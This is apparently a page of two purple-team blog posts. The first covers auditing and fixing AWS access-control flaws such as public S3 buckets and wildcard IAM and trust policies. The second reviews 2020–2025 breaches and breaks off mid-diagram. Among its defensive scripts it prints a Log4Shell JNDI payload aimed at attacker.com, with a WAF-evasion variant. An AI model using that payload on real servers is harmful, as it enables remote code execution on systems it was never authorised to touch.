Broken Access Control in AWS: From Misconfigured S3 to Admin

Reading Time: 9 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025Broken access control in AWS


TL;DR

  • Broken access control in AWS is OWASP A01 — the most common cloud security failure, covering IAM wildcards, public S3 buckets, and overly broad trust policies
  • A public S3 bucket containing 47 million customer records went undetected for six months in an authorized assessment — no GuardDuty finding, no AWS Config alert, because those controls weren’t enabled
  • The red phase: three commands to identify public buckets, enumerate IAM over-permissions, and test trust policy abuse — all with read-only access on your own account
  • The blue phase: two AWS Config managed rules and one GuardDuty finding type that cover the majority of A01 findings
  • The purple phase: deny-based SCPs, bucket public access blocks, and IAM Access Analyzer — structural controls, not monitoring alerts
  • Cross-series: IAM privilege escalation paths (IAM EP08) and AWS least privilege audit (IAM EP09) go deeper on the IAM layer

OWASP Mapping: A01 Broken Access Control — primarily. A09 Logging and Monitoring Failures — the six-month detection gap demonstrates A09 as an amplifier of A01.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│              BROKEN ACCESS CONTROL — ATTACK SURFACE                 │
│                                                                     │
│   INTERNET                    AWS ACCOUNT                           │
│                                                                     │
│   Attacker ──────────────▶  S3 bucket (public read)                 │
│                             └── 47M customer records                │
│                                                                     │
│   Attacker ──────────────▶  IAM user with "Action": "*"             │
│   (compromised creds)        └── escalate → admin access            │
│                                                                     │
│   Attacker ──────────────▶  Trust policy: "AWS": "*"                │
│   (any AWS account)          └── assume role from attacker's        │
│                                  account                            │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│                                                                     │
│   DETECTION GAPS (A09 amplifying A01):                              │
│   • S3 public access not in AWS Config rules                        │
│   • GuardDuty not enabled                                           │
│   • No IAM Access Analyzer                                          │
│   • No SCP boundary on public bucket creation                       │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Broken access control in AWS is the infrastructure equivalent of OWASP A01: a principal can reach a resource it should not be able to reach, because the access control decision was either not made or made incorrectly. In the cloud context, this manifests as public S3 buckets, IAM policies with wildcard actions and resources, and trust policies that allow any principal rather than a specific, scoped entity.


The Assessment That Changed My Approach to Access Control Auditing

During an authorized assessment, I found an S3 bucket containing 47 million customer records. The bucket name was generic — no obvious PII signal in the name itself. It was created two years prior by an engineer who was troubleshooting a data pipeline and needed temporary public access to share data with an external partner. The partner relationship ended. The bucket access was never reverted.

The bucket had been public for six months at the time I found it. I checked the AWS Config rules: S3 public access was not in the rule set. GuardDuty was enabled but no finding had fired — GuardDuty generates a Policy:S3/BucketAnonymousAccessGranted finding when public access is enabled, but only if the finding is new during GuardDuty’s monitoring window. The bucket went public before GuardDuty was enabled.

No alert ever fired. Not because the tools couldn’t detect it — because the tools weren’t configured to look.

This is A01 amplified by A09. The broken access control is the public bucket. The six-month window is the logging and monitoring failure.


Red Phase: How Broken Access Control Works in Practice

The red team perspective on broken access control starts with enumeration. What can this principal reach that it shouldn’t be able to reach?

Enumerating Public S3 Buckets

aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    # Check account-level block
    account_block=$(aws s3control get-public-access-block \
      --account-id $(aws sts get-caller-identity --query Account --output text) \
      2>/dev/null | jq -r '.PublicAccessBlockConfiguration.BlockPublicAcls')

    # Check bucket-level policy
    policy=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic')

    # Check bucket ACL
    acl=$(aws s3api get-bucket-acl --bucket "$bucket" 2>/dev/null | \
      jq -r '.Grants[] | select(.Grantee.URI == "http://acs.amazonaws.com/groups/global/AllUsers") | .Permission')

    if [ "$policy" = "true" ] || [ -n "$acl" ]; then
      echo "PUBLIC BUCKET: $bucket (policy_public=$policy, acl_grants=$acl)"
    fi
  done

Enumerating Overly Permissive IAM Policies

# Find all customer-managed policies with wildcard actions
aws iam list-policies --scope Local --query 'Policies[].Arn' --output text | \
  tr '\t' '\n' | \
  while read arn; do
    version=$(aws iam get-policy --policy-arn "$arn" \
      --query 'Policy.DefaultVersionId' --output text)
    doc=$(aws iam get-policy-version --policy-arn "$arn" --version-id "$version" \
      --query 'PolicyVersion.Document' --output json)

    if echo "$doc" | jq -e '.Statement[] | select(.Effect == "Allow" and .Action == "*")' > /dev/null 2>&1; then
      echo "WILDCARD ACTION POLICY: $arn"
      echo "$doc" | jq '.Statement[] | select(.Effect == "Allow" and .Action == "*")'
    fi
  done

Testing Trust Policy Abuse

# Find IAM roles with overly broad trust policies
# Specifically: trust policies that allow any AWS account or service
aws iam list-roles --query 'Roles[].{Name:RoleName,Arn:Arn}' --output json | \
  jq -r '.[].Arn' | \
  while read role_arn; do
    trust=$(aws iam get-role --role-name "$(basename $role_arn)" \
      --query 'Role.AssumeRolePolicyDocument' --output json 2>/dev/null)

    # Check for wildcard principals
    if echo "$trust" | jq -e '.Statement[] | select(.Principal == "*")' > /dev/null 2>&1; then
      echo "WILDCARD TRUST PRINCIPAL: $role_arn"
    fi

    # Check for cross-account trust without conditions
    if echo "$trust" | jq -e '.Statement[] | select(.Principal.AWS | type == "string" and test("arn:aws:iam::[0-9]+:root"))' > /dev/null 2>&1; then
      account_in_trust=$(echo "$trust" | jq -r '.Statement[] | .Principal.AWS // empty' | grep -oP '(?<=arn:aws:iam::)[0-9]+')
      current_account=$(aws sts get-caller-identity --query Account --output text)
      if [ "$account_in_trust" != "$current_account" ]; then
        echo "CROSS-ACCOUNT TRUST (verify scope): $role_arn trusts account $account_in_trust"
      fi
    fi
  done

Simulating S3 Exfiltration (on your own bucket — safe test)

# Create a test bucket, make it public, verify it's accessible without credentials
# Do this in a non-production account only

TEST_BUCKET="purple-team-test-$(date +%s)"
aws s3 mb s3://${TEST_BUCKET} --region us-east-1

# Disable the public access block (simulates the misconfiguration)
aws s3api put-public-access-block \
  --bucket "${TEST_BUCKET}" \
  --public-access-block-configuration \
  "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"

# Add a public-read bucket policy
aws s3api put-bucket-policy --bucket "${TEST_BUCKET}" --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::'"${TEST_BUCKET}"'/*"
  }]
}'

# Put a test file
echo "PURPLE_TEAM_TEST_DATA" | aws s3 cp - s3://${TEST_BUCKET}/test.txt

# Verify it's accessible without credentials
curl -s "https://${TEST_BUCKET}.s3.amazonaws.com/test.txt"
# Should return: PURPLE_TEAM_TEST_DATA

echo ""
echo "Test complete. Clean up:"
echo "aws s3 rb s3://${TEST_BUCKET} --force"

Blue Phase: What Detection Looks Like

What AWS Config Catches

Two managed rules cover the majority of S3 broken access control findings:

# Enable the S3 public access rules in AWS Config
# (requires Config to already be enabled)

# Rule 1: s3-bucket-public-read-prohibited
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-bucket-public-read-prohibited",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED"
  },
  "Scope": {
    "ComplianceResourceTypes": ["AWS::S3::Bucket"]
  }
}'

# Rule 2: s3-account-level-public-access-blocks-periodic
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-account-level-public-access-blocks-periodic",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_ACCOUNT_LEVEL_PUBLIC_ACCESS_BLOCKS_PERIODIC"
  }
}'

# Check current compliance status
aws configservice describe-compliance-by-config-rule \
  --config-rule-names s3-bucket-public-read-prohibited \
  --query 'ComplianceByConfigRules[].{Rule:ConfigRuleName,Compliance:Compliance.ComplianceType}'

What GuardDuty Catches

GuardDuty generates these findings for S3 broken access control:

Finding Type Trigger Severity
Policy:S3/BucketAnonymousAccessGranted Bucket policy or ACL grants public read/write Medium
Policy:S3/BucketPublicAccessGranted Same as above — alternate finding type Medium
Discovery:S3/MaliciousIPCaller S3 GetObject from a known malicious IP High
# Query GuardDuty findings for S3 public access violations
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": ["Policy:S3/BucketAnonymousAccessGranted", "Policy:S3/BucketPublicAccessGranted"]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, bucket: .Resource.S3BucketDetails[0].Name, severity: .Severity}'

What IAM Access Analyzer Catches

IAM Access Analyzer continuously analyzes resource policies for external access — S3 buckets, IAM roles, KMS keys, SQS queues, Lambda functions. It generates a finding any time a resource policy grants access to a principal outside the AWS account (or AWS Organization boundary).

# Enable IAM Access Analyzer for the account
aws accessanalyzer create-analyzer \
  --analyzer-name "account-access-analyzer" \
  --type ACCOUNT

# List all active findings (external access granted)
aws accessanalyzer list-findings \
  --analyzer-arn $(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text) \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --query 'findings[].{Resource:resource,Principal:principal,Action:action}' \
  --output table

What the CloudTrail Event Looks Like

When an anonymous user accesses a public S3 object:

{
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "AWSAccount",
    "accountId": "ANONYMOUS_PRINCIPAL",  
    "principalId": "ANONYMOUS_PRINCIPAL"
  },
  "eventTime": "2024-03-15T02:47:00Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "GetObject",
  "requestParameters": {
    "bucketName": "your-bucket-name",
    "key": "customer-data/records.csv"
  },
  "sourceIPAddress": "198.51.100.1",
  "userAgent": "python-requests/2.28.0"
}

The signal: userIdentity.type = "AWSAccount" with accountId = "ANONYMOUS_PRINCIPAL" on a GetObject event. This is a read from an anonymous, unauthenticated principal.

# CloudTrail Insights query (Athena) to find anonymous S3 GetObject events
# Assumes CloudTrail S3 data events are enabled for the bucket

SELECT
  eventTime,
  sourceIPAddress,
  requestParameters.bucketName,
  requestParameters.key,
  userIdentity.type,
  userIdentity.accountId
FROM cloudtrail_logs
WHERE
  eventName = 'GetObject'
  AND userIdentity.type = 'AWSAccount'
  AND userIdentity.accountId = 'ANONYMOUS_PRINCIPAL'
  AND eventTime > current_timestamp - interval '7' day
ORDER BY eventTime DESC
LIMIT 100;

Purple Phase: The Structural Fix

Detection catches broken access control after the fact. The structural fix prevents it from being possible.

Fix 1: Account-Level S3 Public Access Block

This is a single setting that prevents any bucket in the account from becoming public — regardless of bucket policy or ACL. It overrides bucket-level settings.

# Enable account-level S3 public access block
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
  "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Verify
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text)

Fix 2: SCP to Prevent Disabling the Public Access Block

An SCP (Service Control Policy) at the AWS Organizations level that prevents any account from disabling the public access block — even an account administrator.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyS3PublicAccessBlockDisable",
      "Effect": "Deny",
      "Action": [
        "s3:PutBucketPublicAccessBlock",
        "s3:DeletePublicAccessBlock"
      ],
      "Resource": "*",
      "Condition": {
        "ArnNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::*:role/s3-public-access-exception-role"
        }
      }
    }
  ]
}
# Apply the SCP to your organizational unit
aws organizations create-policy \
  --name "DenyS3PublicAccessBlockDisable" \
  --type SERVICE_CONTROL_POLICY \
  --content file://scp-deny-s3-public-access.json \
  --description "Prevents disabling S3 public access block at account level"

Fix 3: IAM Policy Cleanup — Remove Wildcards

For IAM policies with wildcard actions, the fix is least-privilege replacement. This is not a quick operation — it requires analyzing actual usage and scoping to what is actually needed.

# Use IAM Access Analyzer policy generation to generate a least-privilege policy
# based on actual CloudTrail activity for a role
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/your-role-name"
  }' \
  --cloud-trail-details '{
    "accessRole": "arn:aws:iam::123456789012:role/access-analyzer-cloudtrail-role",
    "trailProperties": [{
      "cloudTrailArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/your-trail",
      "regions": ["us-east-1", "us-west-2"],
      "allRegions": false
    }],
    "startTime": "2024-01-01T00:00:00Z",
    "endTime": "2024-03-01T00:00:00Z"
  }'

# Retrieve the generated policy
JOB_ID="<returned-job-id>"
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

For a systematic audit approach, the AWS least privilege audit process in IAM EP09 covers how to move from wildcard policies to scoped permissions methodically across a multi-account environment.

Fix 4: IAM Access Analyzer with Automated Archiving

# Create an archive rule for known-good cross-account access
# (prevents alert fatigue from legitimate cross-account patterns)
aws accessanalyzer create-archive-rule \
  --analyzer-name "account-access-analyzer" \
  --rule-name "archive-legitimate-cross-account" \
  --filter '{
    "principal.AWS": {
      "contains": ["arn:aws:iam::111122223333:role/legitimate-cross-account-role"]
    }
  }'

Run This in Your Own Environment: A01 Audit

Run this in any AWS account you own or have read-only access to audit:

#!/bin/bash
# Purple Team EP04 — Broken Access Control (A01) Audit
# Safe to run with read-only IAM permissions

ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
echo "Auditing account: ${ACCOUNT}"
echo "==============================="

echo ""
echo "[A01-1] S3 Account-Level Public Access Block"
aws s3control get-public-access-block --account-id "${ACCOUNT}" 2>/dev/null || \
  echo "  FINDING: Account-level public access block not configured"

echo ""
echo "[A01-2] S3 Buckets with Public Access"
aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\t' '\n' | \
  while read bucket; do
    status=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic // "false"')
    if [ "$status" = "true" ]; then
      echo "  FINDING: Public bucket: $bucket"
    fi
  done

echo ""
echo "[A01-3] IAM Roles with Wildcard Trust Policies"
aws iam list-roles --query 'Roles[].RoleName' --output text | tr '\t' '\n' | head -50 | \
  while read role; do
    trust=$(aws iam get-role --role-name "$role" \
      --query 'Role.AssumeRolePolicyDocument.Statement' 2>/dev/null)
    if echo "$trust" | jq -e '.[] | select(.Principal == "*")' > /dev/null 2>&1; then
      echo "  FINDING: Wildcard trust principal in role: $role"
    fi
  done

echo ""
echo "[A01-4] IAM Access Analyzer — Active External Access Findings"
ANALYZER=$(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text 2>/dev/null)
if [ -z "$ANALYZER" ]; then
  echo "  FINDING: IAM Access Analyzer not enabled"
else
  aws accessanalyzer list-findings \
    --analyzer-arn "${ANALYZER}" \
    --filter '{"status": {"eq": ["ACTIVE"]}}' \
    --query 'findings[].{Resource:resource,Type:resourceType}' \
    --output table
fi

⚠ Common Mistakes When Fixing Broken Access Control in AWS

Fixing the symptom at the bucket level without the account-level block. If you set RestrictPublicBuckets=true on individual buckets but leave the account-level block unset, the next bucket created by another engineer starts with public access possible again. The account-level block is the structural control; the bucket-level setting is defense-in-depth.

Not enabling CloudTrail S3 data events. CloudTrail management events capture bucket creation and policy changes. They do not capture GetObject and PutObject by default — that requires enabling S3 data events, which adds cost. Without data events, you cannot see who accessed what in a public bucket. If you can’t afford data events on all buckets, enable them on buckets containing sensitive data.

Treating IAM Access Analyzer findings as one-time. Access Analyzer runs continuously. A new resource policy that grants external access generates a new finding. If you archive findings without fixing the underlying policy, you lose visibility. Archive only findings that represent intentional, documented cross-account access.

Confusing “no GuardDuty findings” with “no problem.” GuardDuty’s Policy:S3/BucketAnonymousAccessGranted only fires when access is newly granted during GuardDuty’s monitoring window. A bucket that was made public before GuardDuty was enabled will not generate a finding — GuardDuty does not retroactively scan all bucket policies. Use AWS Config for retroactive compliance checks; use GuardDuty for real-time detection of new violations.

For the full IAM attack chain that broken access control enables — including IAM privilege escalation paths via iam:PassRole — see IAM series EP08. The privilege escalation analysis belongs alongside the access control audit.


Quick Reference

Control What It Does AWS Service
Account-level S3 public access block Prevents any bucket from becoming public S3 Control
SCP: deny public access block disable Prevents disabling the account-level block Organizations
AWS Config: S3_BUCKET_PUBLIC_READ_PROHIBITED Flags buckets that are or become public AWS Config
GuardDuty: Policy:S3/BucketAnonymousAccessGranted Detects new public access grants GuardDuty
IAM Access Analyzer Finds all resources with external access grants Access Analyzer
CloudTrail S3 data events Captures GetObject/PutObject for audit CloudTrail
IAM policy generation Generates least-privilege policy from actual usage Access Analyzer

Key Takeaways

  • Broken access control in AWS (OWASP A01) is the most common cloud security failure — IAM wildcards, public S3, and broad trust policies are the three primary manifestations
  • A public S3 bucket with 47 million records was active for six months without a single alert — because the detection controls (AWS Config rules, GuardDuty) weren’t enabled to look for it
  • The structural fix is the account-level S3 public access block enforced by SCP — detection tools catch violations; the SCP prevents the violation from being possible
  • IAM Access Analyzer provides continuous visibility into every resource that grants external access — enable it in every account
  • The red phase can be run with read-only permissions against your own account — the audit script above reveals your current A01 exposure in under five minutes
  • Fixing A01 without enabling the A09 controls (CloudTrail data events, GuardDuty, AWS Config) leaves you blind to whether the fix is working
  • Use Access Analyzer’s policy generation feature to move from wildcard policies to least-privilege without guessing

What’s Next

EP05 covers MFA fatigue attacks — how the Uber and Okta breaches worked at the authentication layer, how to simulate push-notification fatigue in a test environment, and the structural fix: phishing-resistant MFA using FIDO2 hardware keys. The identity layer is where most cloud compromises start — understanding how push MFA fails is the prerequisite for knowing why hardware keys are the only structural answer.

Get EP05 in your inbox when it publishes → subscribe at linuxcent.com

Cloud Security Breaches 2020–2025: What Actually Got Exploited

Reading Time: 11 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025


TL;DR

  • Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident falls into at least one
  • SolarWinds (Dec 2020): build pipeline compromise — attacker signed malware with a legitimate cert (A08)
  • Log4Shell (Dec 2021): injection in a logging library present in millions of Java apps (A03)
  • Uber (Sep 2022): MFA fatigue against a contractor → hardcoded admin creds on internal share (A07 + A02)
  • CircleCI (Jan 2023): session token stolen from an engineer’s laptop → CI/CD secrets exfiltrated (A07 + A08)
  • Okta (Oct 2023): support system access via stolen credentials → customer tenant data exposed (A07)
  • XZ Utils (Apr 2024): 2-year social engineering campaign → backdoor in release tarball (A08 + A06)
  • The attack surface does not change — only the specific vector within each category

OWASP Mapping: This episode is cross-category — A01 through A10 all appear. Each breach is annotated with its primary OWASP mapping.


The Big Picture

┌────────────────────────────────────────────────────────────────────┐
│           2020–2025 BREACH TIMELINE                                │
│                                                                    │
│  Dec 2020    Dec 2021    Sep 2022    Jan 2023    Oct 2023  Apr 2024 │
│     │            │           │           │           │        │    │
│     ▼            ▼           ▼           ▼           ▼        ▼    │
│  Solar-      Log4Shell     Uber       CircleCI     Okta    XZ Utils│
│  Winds                                                             │
│                                                                    │
│  ══════════════════════════════════════════════════════════        │
│                                                                    │
│  Root Cause Categories (3 total):                                  │
│                                                                    │
│  SUPPLY CHAIN          IDENTITY               MISCONFIGURATION     │
│  SolarWinds            Uber                   Capital One (2019)   │
│  XZ Utils              Okta                   CircleCI (partial)   │
│  Log4Shell (partial)   CircleCI (initial)                          │
│                                                                    │
│  OWASP Primaries:                                                  │
│  A08 → A07 → A07 → A07/A08 → A07 → A08/A06                       │
│                                                                    │
└────────────────────────────────────────────────────────────────────┘

The cloud security breaches from 2020 to 2025 reveal a consistent pattern: attackers are not finding new classes of vulnerability. They are exploiting the same three root causes — identity, supply chain, misconfiguration — in different combinations against different technology stacks.


Why These Breaches Are the Curriculum

Every episode in this series from EP04 onward takes a specific attack path from these incidents and walks through the simulation, detection, and fix. You cannot understand the fix without understanding the breach mechanics. And you cannot understand why your detection didn’t fire without knowing what the attacker actually did.

This episode is the reference. When EP05 covers MFA fatigue, it builds on the Uber anatomy here. When EP09 covers XZ Utils, the supply chain mechanics here are the foundation.


December 2020: SolarWinds — Supply Chain at Scale

OWASP: A08 (Software and Data Integrity Failures)

SolarWinds is the incident that defined supply chain attacks for the decade. The attacker — attributed to Russia’s SVR — compromised the build environment for SolarWinds Orion IT monitoring software in early 2020. They inserted a backdoor called SUNBURST into the software build pipeline.

The mechanics:

Normal build pipeline:
  Source code → Build system → Sign with SolarWinds cert → Distribute → Customer installs

Compromised pipeline (SolarWinds):
  Source code → Build system → [SUNBURST injected here] → Sign with SolarWinds cert → Distribute → 18,000 customers install

SUNBURST was signed with SolarWinds’ legitimate Authenticode certificate. It passed signature verification. It was distributed through the normal software update mechanism. Customers with automatic updates installed it because the update was signed by a trusted vendor.

The backdoor remained dormant for 12–14 days after installation before activating. It used DGA (domain generation algorithm) to contact C2 infrastructure, disguising traffic as Orion telemetry. After the initial beaconing period, the attacker manually selected targets from the 18,000 infected environments.

Confirmed affected organizations: US Treasury, US Commerce Department, FireEye, Microsoft, Intel, Deloitte.

What a detection would have looked like:
– Unexpected outbound DNS queries to avsvmcloud.com subdomains
– Orion software making network connections outside its normal profile
– New scheduled tasks or service modifications by the Orion process

The structural failure: The build system was not isolated, not monitored for unexpected behavior, and the build process itself was not reproducible from source. A reproducible build would have made the SUNBURST injection detectable — the build output would not match the source.


December 2021: Log4Shell — Injection in a Logging Library

OWASP: A03 (Injection), A06 (Vulnerable and Outdated Components)

Log4Shell (CVE-2021-44228) is the closest thing to a universal vulnerability that existed in the 2020s. Log4j 2.x was embedded in thousands of Java applications — not as a direct dependency but as a transitive dependency, often several layers deep in the dependency tree. Developers frequently didn’t know they were running it.

The vulnerability: Log4j evaluated JNDI (Java Naming and Directory Interface) lookups embedded in logged strings. Any input that ended up in a log message could trigger a JNDI lookup:

${jndi:ldap://attacker.com/exploit}

# Log4j evaluates the expression, makes LDAP request to attacker.com
# Attacker's LDAP server responds with a Java class
# Log4j loads and executes the class
# Result: remote code execution

The attack was trivial to launch and extremely difficult to fully enumerate exposure for — because Log4j was present as a transitive dependency in components that teams didn’t know they owned.

What made it particularly bad for cloud infrastructure:
– Lambda functions, ECS containers, EKS workloads, and Elastic Beanstalk apps all potentially affected
– WAFs were initially bypassed with encoding variants (${${lower:j}ndi:...})
– The vulnerable class wasn’t in the primary JAR — it was in log4j-core, which appeared as an indirect dependency

# Find Java applications that might include log4j (rough scan — requires access to filesystems)
find / -name "log4j*.jar" -o -name "log4j-core*.jar" 2>/dev/null

# In a Kubernetes context — check running container images for log4j
kubectl get pods -A -o json | \
  jq -r '.items[].spec.containers[].image' | \
  sort -u
# Then scan each image: trivy image --severity CRITICAL <image>

The fix was patching — upgrading Log4j to 2.17.0+. The mitigation was log4j2.formatMsgNoLookups=true or removing the JndiLookup class from the classpath. Neither mitigation addressed the root cause of having an outdated component with critical CVE.


September 2022: Uber — MFA Fatigue Meets Hardcoded Credentials

OWASP: A07 (Identification and Authentication Failures), A02 (Cryptographic Failures)

The Uber breach is a clean illustration of attack chaining: one authentication failure enables discovery of a second authentication failure.

Minute-by-minute anatomy:

  1. Attacker purchases Uber contractor credentials on a criminal marketplace (or phishes them directly)
  2. Contractor has MFA enrolled — Duo push notifications
  3. Attacker initiates login repeatedly, triggering Duo push notifications to contractor’s phone
  4. Contractor rejects 3–4 push notifications
  5. Attacker sends WhatsApp message to contractor’s phone: “Hi, this is IT support. We’re having an issue with your account. Please accept the next Duo notification.”
  6. Contractor accepts
  7. Attacker is in

From inside the Uber network, the attacker found a network share accessible to contractors. On that share: a PowerShell script. In that script: hardcoded admin credentials for Thycotic, Uber’s privileged access management (PAM) system.

With Thycotic admin access, the attacker retrieved credentials for: AWS, GCP, GSuite, VMware, Slack, HackerOne. Full internal access.

The two failures:
– A07: Push-notification MFA that can be defeated by social engineering + fatigue
– A02: Admin credentials in a plaintext PowerShell script on a network share

# Detect MFA fatigue attempts in Okta logs (if Okta is the IdP)
# Query: multiple MFA push rejections followed by acceptance within short window
# In Okta System Log API:
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.authentication.auth_via_mfa\"&since=2024-01-01T00:00:00Z" | \
  jq '[.[] | select(.outcome.result == "FAILURE")] | group_by(.actor.id) | map({user: .[0].actor.displayName, failures: length}) | sort_by(.failures) | reverse | .[0:10]'

The structural fix for MFA fatigue is not user training. It is replacing push-notification MFA with phishing-resistant MFA: FIDO2 hardware keys (YubiKey) or passkeys. A hardware key requires physical presence — a WhatsApp message cannot convince a hardware key to authenticate.


January 2023: CircleCI — Session Token Theft and Secret Exfiltration

OWASP: A07 (Authentication Failures), A08 (Software and Data Integrity Failures)

CircleCI disclosed in January 2023 that an attacker had accessed customer data — specifically, environment variables, tokens, and keys stored by customers in CircleCI’s secret storage.

The attack chain:

  1. Malware on a CircleCI engineer’s laptop stole a 2FA-backed SSO session token
  2. The session token was valid and not yet expired — no MFA re-challenge for the session
  3. Attacker used the session token to access CircleCI’s internal systems
  4. From internal systems, attacker accessed the production database containing encrypted customer secrets
  5. The encryption keys were also accessible — attacker obtained both

The attack did not break encryption. It circumvented encryption by accessing the keys through internal systems that the compromised session token could reach.

What customers stored in CircleCI that was exposed:
– AWS IAM access keys and secret keys
– GitHub tokens
– DockerHub credentials
– SSH private keys
– API tokens for third-party services

The scale: CircleCI could not enumerate which customer secrets were accessed — they notified all customers with environment variables stored in the system.

# After a CI/CD platform breach: rotate all credentials that were stored there
# Start with AWS credentials — find and disable exposed access keys

# List all IAM access keys
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    aws iam list-access-keys --user-name "$user" \
      --query "AccessKeyMetadata[].{User:'$user',Key:AccessKeyId,Status:Status,Created:CreateDate}" \
      --output table
  done

# Disable a specific access key
aws iam update-access-key \
  --access-key-id AKIAIOSFODNN7EXAMPLE \
  --status Inactive \
  --user-name affected-user

The structural lesson: Secrets stored in a CI/CD platform are only as secure as that platform’s internal access controls and the endpoint security of the engineers who access it. The alternative — short-lived credentials via OIDC workload identity — means no long-lived secrets exist to exfiltrate.


October 2023: Okta — Support System Compromise

OWASP: A07 (Identification and Authentication Failures)

Okta is the identity provider for thousands of organizations. An attacker who compromises Okta’s support system gains access to customer identity configurations.

In October 2023, Okta disclosed that an attacker had accessed their customer support case management system using stolen credentials. The attacker used that access to view HTTP Archive (HAR) files that customers had uploaded as part of support tickets. HAR files capture all network traffic in a browser session — including session cookies and authentication tokens.

What the attacker retrieved from HAR files:
– Active session tokens for customer Okta admin accounts
– Enough data to authenticate as Okta admins for affected customers

Confirmed affected customers (that disclosed publicly):
– 1Password (detected and contained quickly)
– Cloudflare
– BeyondTrust

The dwell time: Okta’s later forensic analysis revealed the attacker had access for two weeks before the disclosure.

# Check Okta System Log for suspicious admin activity
# Look for admin authentications from unusual IPs or at unusual times
curl -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  "https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\"user.session.start\"+and+actor.type+eq+\"User\"&since=$(date -d '30 days ago' --iso-8601=seconds)" | \
  jq '.[] | {user: .actor.displayName, ip: .client.ipAddress, time: .published, result: .outcome.result}'

The structural implication for organizations using Okta: Tier-0 accounts (Okta administrators) need break-glass procedures and hardware key MFA — not because Okta itself will be compromised, but because a support system compromise at a SaaS provider can expose session context that reaches those accounts.


April 2024: XZ Utils — Two Years of Social Engineering

OWASP: A08 (Software and Data Integrity Failures), A06 (Vulnerable and Outdated Components)

XZ Utils (CVE-2024-3094) is the most sophisticated supply chain attack to date in the open-source ecosystem. The attacker operated under the pseudonym “Jia Tan” and spent approximately two years building trust in the XZ Utils project before inserting a backdoor.

The timeline:

2022 Q4 — Jia Tan begins contributing to XZ Utils with legitimate, high-quality patches
2023 Q1 — Jia Tan increases contribution frequency; original maintainer shows signs of burnout
2023 Q2 — Jia Tan gains commit access to XZ Utils
2024 Q1 — Jia Tan releases XZ Utils 5.6.0 and 5.6.1 with backdoor in release tarball
          (NOT in git repository — only in the distributed tarball)
2024 Q2 — Andres Freund (Microsoft engineer, incidentally) notices SSH is 500ms slower
          on systems with xz 5.6.x; investigates; finds backdoor
          Reported April 1, 2024; CVE assigned April 2, 2024

The backdoor’s target: The backdoor patched sshd via systemd on glibc-based Linux systems. On affected systems, it would have given the attacker remote code execution on SSH servers — specifically, authentication bypass for a specific RSA key pair held by the attacker.

What was 1–2 weeks from shipping broadly:
– Fedora 40 (test release only — caught before stable)
– Debian unstable/testing
– openSUSE Tumbleweed

The detection insight: The backdoor was in the release tarball, not the git repository. git clone and git diff would not have shown it. The only detection was comparing the distributed tarball’s build output against a reproducible build from source — or noticing the anomalous SSH latency.

# Check if your systems have the affected xz version
xz --version
# Vulnerable: 5.6.0 or 5.6.1

# Check on RPM-based systems
rpm -q xz

# Check on Debian/Ubuntu systems
dpkg -l xz-utils

# Check for sshd linked against compromised libzma
ldd $(which sshd) | grep liblzma
# If libzma is present and xz is 5.6.0 or 5.6.1, the system was exposed

The Three Root Causes: A Framework for Your Exercise Backlog

After analyzing these six incidents (and the broader 2020–2025 breach landscape), three root causes account for virtually every major cloud infrastructure compromise:

┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  ROOT CAUSE 1: IDENTITY                                         │
│  Attacker obtains valid credentials — stolen, phished,          │
│  or socially engineered. MFA does not stop it if MFA            │
│  itself can be bypassed (fatigue, SIM swap, token theft).       │
│  Incidents: Uber, Okta, CircleCI (initial vector)               │
│                                                                 │
│  ROOT CAUSE 2: SUPPLY CHAIN                                     │
│  Attacker compromises something you trust: a vendor's           │
│  software, a build pipeline, an open-source dependency.         │
